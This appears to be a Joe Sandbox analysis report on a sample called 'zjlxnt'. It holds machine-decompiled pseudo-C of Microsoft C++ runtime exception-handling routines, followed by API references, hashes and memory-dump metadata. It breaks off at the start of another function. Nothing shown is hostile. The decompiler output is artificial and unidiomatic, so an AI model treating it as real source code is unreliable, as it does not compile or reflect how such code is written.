                                                          				_v28 = 0;
                                                          				_t275 = E00403EF9(_a8, _a16, _t301);
                                                          				_t332 = _t331 + 0xc;
                                                          				_v12 = _t275;
                                                          				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                                                          					L67:
                                                          					_t201 = E0040623E(_t270, _t275, _t296, _t315);
                                                          					asm("int3");
                                                          					_t329 = _t332;
                                                          					_t333 = _t332 - 0x38;
                                                          					_push(_t270);
                                                          					_t271 = _v112;
                                                          					__eflags =  *_t271 - 0x80000003;
                                                          					if( *_t271 == 0x80000003) {
                                                          						return _t201;
                                                          					} else {
                                                          						_push(_t315);
                                                          						_push(_t301);
                                                          						_t202 = E00402403(_t271, _t275, _t296, _t315);
                                                          						__eflags =  *(_t202 + 8);
                                                          						if( *(_t202 + 8) != 0) {
                                                          							__imp__EncodePointer(0);
                                                          							_t315 = _t202;
                                                          							_t222 = E00402403(_t271, _t275, _t296, _t315);
                                                          							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                                                          							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                                                          								__eflags =  *_t271 - 0xe0434f4d;
                                                          								if( *_t271 != 0xe0434f4d) {
                                                          									__eflags =  *_t271 - 0xe0434352;
                                                          									if( *_t271 != 0xe0434352) {
                                                          										_t214 = E00402881(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                                                          										_t333 = _t333 + 0x1c;
                                                          										__eflags = _t214;
                                                          										if(_t214 != 0) {
                                                          											L84:
                                                          											return _t214;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						_t203 = _a16;
                                                          						_v28 = _t203;
                                                          						_v24 = 0;
                                                          						__eflags =  *(_t203 + 0xc);
                                                          						if( *(_t203 + 0xc) > 0) {
                                                          							_push(_a24);
                                                          							E004027B4(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                                                          							_t298 = _v40;
                                                          							_t334 = _t333 + 0x18;
                                                          							_t214 = _v44;
                                                          							_v20 = _t214;
                                                          							_v12 = _t298;
                                                          							__eflags = _t298 - _v32;
                                                          							if(_t298 >= _v32) {
                                                          								goto L84;
                                                          							}
                                                          							_t277 = _t298 * 0x14;
                                                          							__eflags = _t277;
                                                          							_v16 = _t277;
                                                          							do {
                                                          								_t278 = 5;
                                                          								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                                                          								_t334 = _t334 + 0xc;
                                                          								__eflags = _v64 - _t217;
                                                          								if(_v64 > _t217) {
                                                          									goto L83;
                                                          								}
                                                          								__eflags = _t217 - _v60;
                                                          								if(_t217 > _v60) {
                                                          									goto L83;
                                                          								}
                                                          								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                          								_t283 = _t220[4];
                                                          								__eflags = _t283;
                                                          								if(_t283 == 0) {
                                                          									L81:
                                                          									__eflags =  *_t220 & 0x00000040;
                                                          									if(( *_t220 & 0x00000040) == 0) {
                                                          										_push(0);
                                                          										_push(1);
                                                          										E004032BB(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                                                          										_t298 = _v12;
                                                          										_t334 = _t334 + 0x30;
                                                          									}
                                                          									goto L83;
                                                          								}
                                                          								__eflags =  *((char*)(_t283 + 8));
                                                          								if( *((char*)(_t283 + 8)) != 0) {
                                                          									goto L83;
                                                          								}
                                                          								goto L81;
                                                          								L83:
                                                          								_t298 = _t298 + 1;
                                                          								_t214 = _v20;
                                                          								_t277 = _v16 + 0x14;
                                                          								_v12 = _t298;
                                                          								_v16 = _t277;
                                                          								__eflags = _t298 - _v32;
                                                          							} while (_t298 < _v32);
                                                          							goto L84;
                                                          						}
                                                          						E0040623E(_t271, _t275, _t296, _t315);
                                                          						asm("int3");
                                                          						_push(_t329);
                                                          						_t297 = _v184;
                                                          						_push(_t271);
                                                          						_push(_t315);
                                                          						_push(0);
                                                          						_t205 = _t297[4];
                                                          						__eflags = _t205;
                                                          						if(_t205 == 0) {
                                                          							L109:
                                                          							_t207 = 1;
                                                          							__eflags = 1;
                                                          						} else {
                                                          							_t276 = _t205 + 8;
                                                          							__eflags =  *_t276;
                                                          							if( *_t276 == 0) {
                                                          								goto L109;
                                                          							} else {
                                                          								__eflags =  *_t297 & 0x00000080;
                                                          								_t304 = _v0;
                                                          								if(( *_t297 & 0x00000080) == 0) {
                                                          									L91:
                                                          									_t272 = _t304[4];
                                                          									_t317 = 0;
                                                          									__eflags = _t205 - _t272;
                                                          									if(_t205 == _t272) {
                                                          										L101:
                                                          										__eflags =  *_t304 & 0x00000002;
                                                          										if(( *_t304 & 0x00000002) == 0) {
                                                          											L103:
                                                          											_t208 = _a4;
                                                          											__eflags =  *_t208 & 0x00000001;
                                                          											if(( *_t208 & 0x00000001) == 0) {
                                                          												L105:
                                                          												__eflags =  *_t208 & 0x00000002;
                                                          												if(( *_t208 & 0x00000002) == 0) {
                                                          													L107:
                                                          													_t317 = 1;
                                                          													__eflags = 1;
                                                          												} else {
                                                          													__eflags =  *_t297 & 0x00000002;
                                                          													if(( *_t297 & 0x00000002) != 0) {
                                                          														goto L107;
                                                          													}
                                                          												}
                                                          											} else {
                                                          												__eflags =  *_t297 & 0x00000001;
                                                          												if(( *_t297 & 0x00000001) != 0) {
                                                          													goto L105;
                                                          												}
                                                          											}
                                                          										} else {
                                                          											__eflags =  *_t297 & 0x00000008;
                                                          											if(( *_t297 & 0x00000008) != 0) {
                                                          												goto L103;
                                                          											}
                                                          										}
                                                          										_t207 = _t317;
                                                          									} else {
                                                          										_t184 = _t272 + 8; // 0x6e
                                                          										_t209 = _t184;
                                                          										while(1) {
                                                          											_t273 =  *_t276;
                                                          											__eflags = _t273 -  *_t209;
                                                          											if(_t273 !=  *_t209) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t273;
                                                          											if(_t273 == 0) {
                                                          												L97:
                                                          												_t210 = _t317;
                                                          											} else {
                                                          												_t274 =  *((intOrPtr*)(_t276 + 1));
                                                          												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                                                          												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                                                          													break;
                                                          												} else {
                                                          													_t276 = _t276 + 2;
                                                          													_t209 = _t209 + 2;
                                                          													__eflags = _t274;
                                                          													if(_t274 != 0) {
                                                          														continue;
                                                          													} else {
                                                          														goto L97;
                                                          													}
                                                          												}
                                                          											}
                                                          											L99:
                                                          											__eflags = _t210;
                                                          											if(_t210 == 0) {
                                                          												goto L101;
                                                          											} else {
                                                          												_t207 = 0;
                                                          											}
                                                          											goto L110;
                                                          										}
                                                          										asm("sbb eax, eax");
                                                          										_t210 = _t209 | 0x00000001;
                                                          										__eflags = _t210;
                                                          										goto L99;
                                                          									}
                                                          								} else {
                                                          									__eflags =  *_t304 & 0x00000010;
                                                          									if(( *_t304 & 0x00000010) != 0) {
                                                          										goto L109;
                                                          									} else {
                                                          										goto L91;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						L110:
                                                          						return _t207;
                                                          					}
                                                          				} else {
                                                          					_t270 = _a4;
                                                          					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                                                          						L22:
                                                          						_t296 = _a12;
                                                          						_v8 = _t296;
                                                          						goto L24;
                                                          					} else {
                                                          						_t315 = 0;
                                                          						if(_t270[0x1c] != 0) {
                                                          							goto L22;
                                                          						} else {
                                                          							_t224 = E00402403(_t270, _t275, _t296, 0);
                                                          							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                                                          								L61:
                                                          								return _t224;
                                                          							} else {
                                                          								_t270 =  *(E00402403(_t270, _t275, _t296, 0) + 0x10);
                                                          								_t259 = E00402403(_t270, _t275, _t296, 0);
                                                          								_v28 = 1;
                                                          								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                                                          								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                                                          									goto L67;
                                                          								} else {
                                                          									if( *((intOrPtr*)(E00402403(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
                                                          										L23:
                                                          										_t296 = _v8;
                                                          										_t275 = _v12;
                                                          										L24:
                                                          										_v52 = _t301;
                                                          										_v48 = 0;
                                                          										__eflags =  *_t270 - 0xe06d7363;
                                                          										if( *_t270 != 0xe06d7363) {
                                                          											L57:
                                                          											__eflags = _t301[3];
                                                          											if(_t301[3] <= 0) {
                                                          												goto L60;
                                                          											} else {
                                                          												__eflags = _a24;
                                                          												if(_a24 != 0) {
                                                          													goto L67;
                                                          												} else {
                                                          													_push(_a32);
                                                          													_push(_a28);
                                                          													_push(_t275);
                                                          													_push(_t301);
                                                          													_push(_a16);
                                                          													_push(_t296);
                                                          													_push(_a8);
                                                          													_push(_t270);
                                                          													L68();
                                                          													_t332 = _t332 + 0x20;
                                                          													goto L60;
                                                          												}
                                                          											}
                                                          										} else {
                                                          											__eflags = _t270[0x10] - 3;
                                                          											if(_t270[0x10] != 3) {
                                                          												goto L57;
                                                          											} else {
                                                          												__eflags = _t270[0x14] - 0x19930520;
                                                          												if(_t270[0x14] == 0x19930520) {
                                                          													L29:
                                                          													_t315 = _a32;
                                                          													__eflags = _t301[3];
                                                          													if(_t301[3] > 0) {
                                                          														_push(_a28);
                                                          														E004027B4(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                                                          														_t296 = _v64;
                                                          														_t332 = _t332 + 0x18;
                                                          														_t247 = _v68;
                                                          														_v44 = _t247;
                                                          														_v16 = _t296;
                                                          														__eflags = _t296 - _v56;
                                                          														if(_t296 < _v56) {
                                                          															_t290 = _t296 * 0x14;
                                                          															__eflags = _t290;
                                                          															_v32 = _t290;
                                                          															do {
                                                          																_t291 = 5;
                                                          																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                                                          																_t332 = _t332 + 0xc;
                                                          																__eflags = _v104 - _t250;
                                                          																if(_v104 <= _t250) {
                                                          																	__eflags = _t250 - _v100;
                                                          																	if(_t250 <= _v100) {
                                                          																		_t294 = 0;
                                                          																		_v20 = 0;
                                                          																		__eflags = _v92;
                                                          																		if(_v92 != 0) {
                                                          																			_t299 = _t270[0x1c];
                                                          																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                                                          																			_t252 = _t251 + 4;
                                                          																			__eflags = _t252;
                                                          																			_v36 = _t252;
                                                          																			_t253 = _v88;
                                                          																			_v40 =  *_t251;
                                                          																			_v24 = _t253;
                                                          																			do {
                                                          																				asm("movsd");
                                                          																				asm("movsd");
                                                          																				asm("movsd");
                                                          																				asm("movsd");
                                                          																				_t327 = _v40;
                                                          																				_t314 = _v36;
                                                          																				__eflags = _t327;
                                                          																				if(_t327 <= 0) {
                                                          																					goto L40;
                                                          																				} else {
                                                          																					while(1) {
                                                          																						_push(_t299);
                                                          																						_push( *_t314);
                                                          																						_t254 =  &_v84;
                                                          																						_push(_t254);
                                                          																						L87();
                                                          																						_t332 = _t332 + 0xc;
                                                          																						__eflags = _t254;
                                                          																						if(_t254 != 0) {
                                                          																							break;
                                                          																						}
                                                          																						_t299 = _t270[0x1c];
                                                          																						_t327 = _t327 - 1;
                                                          																						_t314 = _t314 + 4;
                                                          																						__eflags = _t327;
                                                          																						if(_t327 > 0) {
                                                          																							continue;
                                                          																						} else {
                                                          																							_t294 = _v20;
                                                          																							_t253 = _v24;
                                                          																							goto L40;
                                                          																						}
                                                          																						goto L43;
                                                          																					}
                                                          																					_push(_a24);
                                                          																					_push(_v28);
                                                          																					E004032BB(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                                                          																					_t332 = _t332 + 0x30;
                                                          																				}
                                                          																				L43:
                                                          																				_t296 = _v16;
                                                          																				goto L44;
                                                          																				L40:
                                                          																				_t294 = _t294 + 1;
                                                          																				_t253 = _t253 + 0x10;
                                                          																				_v20 = _t294;
                                                          																				_v24 = _t253;
                                                          																				__eflags = _t294 - _v92;
                                                          																			} while (_t294 != _v92);
                                                          																			goto L43;
                                                          																		}
                                                          																	}
                                                          																}
                                                          																L44:
                                                          																_t296 = _t296 + 1;
                                                          																_t247 = _v44;
                                                          																_t290 = _v32 + 0x14;
                                                          																_v16 = _t296;
                                                          																_v32 = _t290;
                                                          																__eflags = _t296 - _v56;
                                                          															} while (_t296 < _v56);
                                                          															_t301 = _a20;
                                                          															_t315 = _a32;
                                                          														}
                                                          													}
                                                          													__eflags = _a24;
                                                          													if(__eflags != 0) {
                                                          														_push(1);
                                                          														E00401F30(_t270, _t301, _t315, __eflags);
                                                          														_t275 = _t270;
                                                          													}
                                                          													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                                                          													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                                                          														L60:
                                                          														_t224 = E00402403(_t270, _t275, _t296, _t315);
                                                          														__eflags =  *(_t224 + 0x1c);
                                                          														if( *(_t224 + 0x1c) != 0) {
                                                          															goto L67;
                                                          														} else {
                                                          															goto L61;
                                                          														}
                                                          													} else {
                                                          														_t228 = _t301[8] >> 2;
                                                          														__eflags = _t301[7];
                                                          														if(_t301[7] != 0) {
                                                          															__eflags = _t228 & 0x00000001;
                                                          															if((_t228 & 0x00000001) == 0) {
                                                          																_push(_t301[7]);
                                                          																_t229 = E00403DBA(_t270, _t301, _t315, _t270);
                                                          																_pop(_t275);
                                                          																__eflags = _t229;
                                                          																if(_t229 == 0) {
                                                          																	goto L64;
                                                          																} else {
                                                          																	goto L60;
                                                          																}
                                                          															} else {
                                                          																goto L54;
                                                          															}
                                                          														} else {
                                                          															__eflags = _t228 & 0x00000001;
                                                          															if((_t228 & 0x00000001) == 0) {
                                                          																goto L60;
                                                          															} else {
                                                          																__eflags = _a28;
                                                          																if(_a28 != 0) {
                                                          																	goto L60;
                                                          																} else {
                                                          																	L54:
                                                          																	 *(E00402403(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                                                          																	_t237 = E00402403(_t270, _t275, _t296, _t315);
                                                          																	_t286 = _v8;
                                                          																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                                                          																	goto L62;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													__eflags = _t270[0x14] - 0x19930521;
                                                          													if(_t270[0x14] == 0x19930521) {
                                                          														goto L29;
                                                          													} else {
                                                          														__eflags = _t270[0x14] - 0x19930522;
                                                          														if(_t270[0x14] != 0x19930522) {
                                                          															goto L57;
                                                          														} else {
                                                          															goto L29;
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_v16 =  *((intOrPtr*)(E00402403(_t270, _t275, _t296, _t315) + 0x1c));
                                                          										_t264 = E00402403(_t270, _t275, _t296, _t315);
                                                          										_push(_v16);
                                                          										 *(_t264 + 0x1c) = _t315;
                                                          										_t265 = E00403DBA(_t270, _t301, _t315, _t270);
                                                          										_pop(_t286);
                                                          										if(_t265 != 0) {
                                                          											goto L23;
                                                          										} else {
                                                          											_t301 = _v16;
                                                          											_t353 =  *_t301 - _t315;
                                                          											if( *_t301 <= _t315) {
                                                          												L62:
                                                          												E00406182(_t270, _t286, _t296, _t301, _t315, __eflags);
                                                          											} else {
                                                          												while(1) {
                                                          													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                                                          													if(E00403A16( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4188d4) != 0) {
                                                          														goto L63;
                                                          													}
                                                          													_t315 = _t315 + 0x10;
                                                          													_t269 = _v20 + 1;
                                                          													_v20 = _t269;
                                                          													_t353 = _t269 -  *_t301;
                                                          													if(_t269 >=  *_t301) {
                                                          														goto L62;
                                                          													} else {
                                                          														continue;
                                                          													}
                                                          													goto L63;
                                                          												}
                                                          											}
                                                          											L63:
                                                          											_push(1);
                                                          											_push(_t270);
                                                          											E00401F30(_t270, _t301, _t315, __eflags);
                                                          											_t275 =  &_v64;
                                                          											E004039C1( &_v64);
                                                          											E00403FA6( &_v64, 0x416604);
                                                          											L64:
                                                          											 *(E00402403(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                                                          											_t231 = E00402403(_t270, _t275, _t296, _t315);
                                                          											_t275 = _v8;
                                                          											 *(_t231 + 0x14) = _v8;
                                                          											__eflags = _t315;
                                                          											if(_t315 == 0) {
                                                          												_t315 = _a8;
                                                          											}
                                                          											E004029A7(_t275, _t315, _t270);
                                                          											E00403CBA(_a8, _a16, _t301);
                                                          											_t234 = E00403E77(_t301);
                                                          											_t332 = _t332 + 0x10;
                                                          											_push(_t234);
                                                          											E00403C31(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                          											goto L67;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}






















































































                                                          0x0040333b
                                                          0x00403342
                                                          0x00403344
                                                          0x0040334d
                                                          0x00403353
                                                          0x0040335b
                                                          0x0040335d
                                                          0x00403360
                                                          0x00403366
                                                          0x004036da
                                                          0x004036da
                                                          0x004036df
                                                          0x004036e1
                                                          0x004036e3
                                                          0x004036e6
                                                          0x004036e7
                                                          0x004036ea
                                                          0x004036f0
                                                          0x0040380f
                                                          0x004036f6
                                                          0x004036f6
                                                          0x004036f7
                                                          0x004036f8
                                                          0x004036ff
                                                          0x00403702
                                                          0x00403705
                                                          0x0040370b
                                                          0x0040370d
                                                          0x00403712
                                                          0x00403715
                                                          0x00403717
                                                          0x0040371d
                                                          0x0040371f
                                                          0x00403725
                                                          0x0040373a
                                                          0x0040373f
                                                          0x00403742
                                                          0x00403744
                                                          0x0040380b
                                                          0x00000000
                                                          0x0040380c
                                                          0x00403744
                                                          0x00403725
                                                          0x0040371d
                                                          0x00403715
                                                          0x0040374a
                                                          0x0040374d
                                                          0x00403750
                                                          0x00403753
                                                          0x00403756
                                                          0x0040375c
                                                          0x0040376e
                                                          0x00403773
                                                          0x00403776
                                                          0x00403779
                                                          0x0040377c
                                                          0x0040377f
                                                          0x00403782
                                                          0x00403785
                                                          0x00000000
                                                          0x00000000
                                                          0x0040378b
                                                          0x0040378b
                                                          0x0040378e
                                                          0x00403791
                                                          0x004037a0
                                                          0x004037a1
                                                          0x004037a1
                                                          0x004037a3
                                                          0x004037a6
                                                          0x00000000
                                                          0x00000000
                                                          0x004037a8
                                                          0x004037ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004037b9
                                                          0x004037bb
                                                          0x004037be
                                                          0x004037c0
                                                          0x004037c8
                                                          0x004037c8
                                                          0x004037cb
                                                          0x004037cd
                                                          0x004037cf
                                                          0x004037eb
                                                          0x004037f0
                                                          0x004037f3
                                                          0x004037f3
                                                          0x00000000
                                                          0x004037cb
                                                          0x004037c2
                                                          0x004037c6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004037f6
                                                          0x004037f9
                                                          0x004037fa
                                                          0x004037fd
                                                          0x00403800
                                                          0x00403803
                                                          0x00403806
                                                          0x00403806
                                                          0x00000000
                                                          0x00403791
                                                          0x00403810
                                                          0x00403815
                                                          0x00403816
                                                          0x00403819
                                                          0x0040381c
                                                          0x0040381d
                                                          0x0040381e
                                                          0x0040381f
                                                          0x00403822
                                                          0x00403824
                                                          0x0040389c
                                                          0x0040389e
                                                          0x0040389e
                                                          0x00403826
                                                          0x00403826
                                                          0x00403829
                                                          0x0040382c
                                                          0x00000000
                                                          0x0040382e
                                                          0x0040382e
                                                          0x00403831
                                                          0x00403834
                                                          0x0040383b
                                                          0x0040383b
                                                          0x0040383e
                                                          0x00403840
                                                          0x00403842
                                                          0x00403874
                                                          0x00403874
                                                          0x00403877
                                                          0x0040387e
                                                          0x0040387e
                                                          0x00403881
                                                          0x00403884
                                                          0x0040388b
                                                          0x0040388b
                                                          0x0040388e
                                                          0x00403895
                                                          0x00403897
                                                          0x00403897
                                                          0x00403890
                                                          0x00403890
                                                          0x00403893
                                                          0x00000000
                                                          0x00000000
                                                          0x00403893
                                                          0x00403886
                                                          0x00403886
                                                          0x00403889
                                                          0x00000000
                                                          0x00000000
                                                          0x00403889
                                                          0x00403879
                                                          0x00403879
                                                          0x0040387c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040387c
                                                          0x00403898
                                                          0x00403844
                                                          0x00403844
                                                          0x00403844
                                                          0x00403847
                                                          0x00403847
                                                          0x00403849
                                                          0x0040384b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040384d
                                                          0x0040384f
                                                          0x00403863
                                                          0x00403863
                                                          0x00403851
                                                          0x00403851
                                                          0x00403854
                                                          0x00403857
                                                          0x00000000
                                                          0x00403859
                                                          0x00403859
                                                          0x0040385c
                                                          0x0040385f
                                                          0x00403861
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403861
                                                          0x00403857
                                                          0x0040386c
                                                          0x0040386c
                                                          0x0040386e
                                                          0x00000000
                                                          0x00403870
                                                          0x00403870
                                                          0x00403870
                                                          0x00000000
                                                          0x0040386e
                                                          0x00403867
                                                          0x00403869
                                                          0x00403869
                                                          0x00000000
                                                          0x00403869
                                                          0x00403836
                                                          0x00403836
                                                          0x00403839
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403839
                                                          0x00403834
                                                          0x0040382c
                                                          0x0040389f
                                                          0x004038a3
                                                          0x004038a3
                                                          0x00403375
                                                          0x00403375
                                                          0x0040337e
                                                          0x0040347b
                                                          0x0040347b
                                                          0x0040347e
                                                          0x00000000
                                                          0x004033ad
                                                          0x004033ad
                                                          0x004033b2
                                                          0x00000000
                                                          0x004033b8
                                                          0x004033b8
                                                          0x004033c0
                                                          0x00403674
                                                          0x00403678
                                                          0x004033c6
                                                          0x004033cb
                                                          0x004033ce
                                                          0x004033d3
                                                          0x004033da
                                                          0x004033df
                                                          0x00000000
                                                          0x00403417
                                                          0x0040341f
                                                          0x00403483
                                                          0x00403483
                                                          0x00403486
                                                          0x00403489
                                                          0x0040348b
                                                          0x0040348e
                                                          0x00403491
                                                          0x00403497
                                                          0x00403643
                                                          0x00403643
                                                          0x00403646
                                                          0x00000000
                                                          0x00403648
                                                          0x00403648
                                                          0x0040364b
                                                          0x00000000
                                                          0x00403651
                                                          0x00403651
                                                          0x00403654
                                                          0x00403657
                                                          0x00403658
                                                          0x00403659
                                                          0x0040365c
                                                          0x0040365d
                                                          0x00403660
                                                          0x00403661
                                                          0x00403666
                                                          0x00000000
                                                          0x00403666
                                                          0x0040364b
                                                          0x0040349d
                                                          0x0040349d
                                                          0x004034a1
                                                          0x00000000
                                                          0x004034a7
                                                          0x004034a7
                                                          0x004034ae
                                                          0x004034c6
                                                          0x004034c6
                                                          0x004034c9
                                                          0x004034cc
                                                          0x004034d2
                                                          0x004034e2
                                                          0x004034e7
                                                          0x004034ea
                                                          0x004034ed
                                                          0x004034f0
                                                          0x004034f3
                                                          0x004034f6
                                                          0x004034f9
                                                          0x004034ff
                                                          0x004034ff
                                                          0x00403502
                                                          0x00403505
                                                          0x00403514
                                                          0x00403515
                                                          0x00403515
                                                          0x00403517
                                                          0x0040351a
                                                          0x00403520
                                                          0x00403523
                                                          0x00403529
                                                          0x0040352b
                                                          0x0040352e
                                                          0x00403531
                                                          0x00403537
                                                          0x0040353a
                                                          0x0040353f
                                                          0x0040353f
                                                          0x00403542
                                                          0x00403545
                                                          0x00403548
                                                          0x0040354b
                                                          0x0040354e
                                                          0x00403553
                                                          0x00403554
                                                          0x00403555
                                                          0x00403556
                                                          0x00403557
                                                          0x0040355a
                                                          0x0040355d
                                                          0x0040355f
                                                          0x00000000
                                                          0x00403561
                                                          0x00403561
                                                          0x00403561
                                                          0x00403562
                                                          0x00403564
                                                          0x00403567
                                                          0x00403568
                                                          0x0040356d
                                                          0x00403570
                                                          0x00403572
                                                          0x00000000
                                                          0x00000000
                                                          0x00403574
                                                          0x00403577
                                                          0x00403578
                                                          0x0040357b
                                                          0x0040357d
                                                          0x00000000
                                                          0x0040357f
                                                          0x0040357f
                                                          0x00403582
                                                          0x00000000
                                                          0x00403582
                                                          0x00000000
                                                          0x0040357d
                                                          0x00403596
                                                          0x0040359c
                                                          0x004035b9
                                                          0x004035be
                                                          0x004035be
                                                          0x004035c1
                                                          0x004035c1
                                                          0x00000000
                                                          0x00403585
                                                          0x00403585
                                                          0x00403586
                                                          0x00403589
                                                          0x0040358c
                                                          0x0040358f
                                                          0x0040358f
                                                          0x00000000
                                                          0x00403594
                                                          0x00403531
                                                          0x00403523
                                                          0x004035c4
                                                          0x004035c7
                                                          0x004035c8
                                                          0x004035cb
                                                          0x004035ce
                                                          0x004035d1
                                                          0x004035d4
                                                          0x004035d4
                                                          0x004035dd
                                                          0x004035e0
                                                          0x004035e0
                                                          0x004034f9
                                                          0x004035e3
                                                          0x004035e7
                                                          0x004035e9
                                                          0x004035ec
                                                          0x004035f2
                                                          0x004035f2
                                                          0x004035fa
                                                          0x004035ff
                                                          0x00403669
                                                          0x00403669
                                                          0x0040366e
                                                          0x00403672
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403601
                                                          0x00403604
                                                          0x00403607
                                                          0x0040360b
                                                          0x00403619
                                                          0x0040361b
                                                          0x00403632
                                                          0x00403636
                                                          0x0040363c
                                                          0x0040363d
                                                          0x0040363f
                                                          0x00000000
                                                          0x00403641
                                                          0x00000000
                                                          0x00403641
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040360d
                                                          0x0040360d
                                                          0x0040360f
                                                          0x00000000
                                                          0x00403611
                                                          0x00403611
                                                          0x00403615
                                                          0x00000000
                                                          0x00403617
                                                          0x0040361d
                                                          0x00403622
                                                          0x00403625
                                                          0x0040362a
                                                          0x0040362d
                                                          0x00000000
                                                          0x0040362d
                                                          0x00403615
                                                          0x0040360f
                                                          0x0040360b
                                                          0x004034b0
                                                          0x004034b0
                                                          0x004034b7
                                                          0x00000000
                                                          0x004034b9
                                                          0x004034b9
                                                          0x004034c0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004034c0
                                                          0x004034b7
                                                          0x004034ae
                                                          0x004034a1
                                                          0x00403421
                                                          0x00403429
                                                          0x0040342c
                                                          0x00403431
                                                          0x00403435
                                                          0x00403438
                                                          0x0040343e
                                                          0x00403441
                                                          0x00000000
                                                          0x00403443
                                                          0x00403443
                                                          0x00403446
                                                          0x00403448
                                                          0x00403679
                                                          0x00403679
                                                          0x00000000
                                                          0x0040344e
                                                          0x00403456
                                                          0x00403461
                                                          0x00000000
                                                          0x00000000
                                                          0x0040346a
                                                          0x0040346d
                                                          0x0040346e
                                                          0x00403471
                                                          0x00403473
                                                          0x00000000
                                                          0x00403479
                                                          0x00000000
                                                          0x00403479
                                                          0x00000000
                                                          0x00403473
                                                          0x0040344e
                                                          0x0040367e
                                                          0x0040367e
                                                          0x00403680
                                                          0x00403681
                                                          0x00403688
                                                          0x0040368b
                                                          0x00403699
                                                          0x0040369e
                                                          0x004036a3
                                                          0x004036a6
                                                          0x004036ab
                                                          0x004036ae
                                                          0x004036b1
                                                          0x004036b3
                                                          0x004036b5
                                                          0x004036b5
                                                          0x004036ba
                                                          0x004036c6
                                                          0x004036cc
                                                          0x004036d1
                                                          0x004036d4
                                                          0x004036d5
                                                          0x00000000
                                                          0x004036d5
                                                          0x00403441
                                                          0x0040341f
                                                          0x004033df
                                                          0x004033c0
                                                          0x004033b2
                                                          0x0040337e

                                                          APIs
                                                          • type_info::operator==.LIBVCRUNTIME ref: 0040345A
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00403568
                                                          • _UnwindNestedFrames.LIBCMT ref: 004036BA
                                                          • CallUnexpected.LIBVCRUNTIME ref: 004036D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 2751267872-393685449
                                                          • Opcode ID: 84e90d107850ba68984f0374c74d9d647df64166b6b85148c58019ec3215ba6b
                                                          • Instruction ID: 326e648ef647dd601b0ca67ad18aa5df6b903cc15dab9f90c6c3f42a64a10276
                                                          • Opcode Fuzzy Hash: 84e90d107850ba68984f0374c74d9d647df64166b6b85148c58019ec3215ba6b
                                                          • Instruction Fuzzy Hash: 0CB17671800209AFCF25DFA5C8819AEBFB9BF04316B14456BE8017B392C779DB51CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E0040E7BE(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
                                                          				signed int _v8;
                                                          				char _v22;
                                                          				struct _cpinfo _v28;
                                                          				signed int _v32;
                                                          				intOrPtr* _v36;
                                                          				signed int _v40;
                                                          				intOrPtr _v44;
